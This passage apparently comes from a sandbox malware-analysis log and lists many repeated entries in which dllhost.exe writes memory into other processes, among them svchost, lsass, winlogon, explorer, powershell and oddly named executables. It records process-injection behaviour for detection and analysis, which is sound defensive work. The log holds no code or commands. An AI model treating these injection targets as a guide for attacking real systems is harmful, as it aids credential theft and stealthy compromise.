Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 870000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A8C180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242BF650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2578F260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1B68BCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E591C90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2134E420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\IhrFKM.exe base: 29FC5300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\IhrFKM.exe base: 29FC5610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A463AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24261410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1C7ADC40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242997D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2910000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 15E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1080000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2E80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 22A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2860000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2980000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 29A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2F00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B20000
